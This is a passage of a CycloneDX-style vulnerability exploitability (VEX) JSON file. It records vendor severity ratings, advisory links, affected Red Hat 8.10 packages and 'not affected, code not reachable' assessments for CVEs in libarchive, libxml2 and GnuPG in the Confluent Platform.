      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-25724",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        252
      ],
      "description": "list_item_verbose in tar/util.c in libarchive through 3.7.7 does not check an strftime return value, which can lead to a denial of service or unspecified other impact via a crafted TAR archive that is read with a verbose value of 2. For example, the 100-byte buffer may not be sufficient for a custom locale.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-25724"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:9431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-25724"
        },
        {
          "url": "https://bugzilla.redhat.com/2349221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2349221"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25724"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-9431.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:9431"
        },
        {
          "url": "https://gist.github.com/Ekkosun/a83870ce7f3b7813b9b462a395e8ad92"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdtarbug"
        },
        {
          "url": "https://github.com/advisories/GHSA-722w-734r-qg74"
        },
        {
          "url": "https://github.com/libarchive/libarchive/blob/b439d586f53911c84be5e380445a8a259e19114c/tar/util.c#L751-L752"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-25724.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-9431.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25724"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
        }
      ],
      "published": "2025-03-02T02:15:36+00:00",
      "updated": "2026-06-17T09:01:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-27113",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-27113"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-27113"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/861"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27113"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250306-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-27113"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/02/18/2"
        }
      ],
      "published": "2025-02-18T23:15:10+00:00",
      "updated": "2026-06-17T09:03:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-30258",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        754
      ],
      "description": "In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a \"verification DoS.\"",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-30258"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-30258"
        },
        {
          "url": "https://dev.gnupg.org/T7527"
        },
        {
          "url": "https://dev.gnupg.org/rG48978ccb4e20866472ef18436a32744350a65158"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2025q1/000491.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30258"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7412-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-30258"
        }
      ],
      "published": "2025-03-19T20:15:20+00:00",
      "updated": "2026-06-17T09:08:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
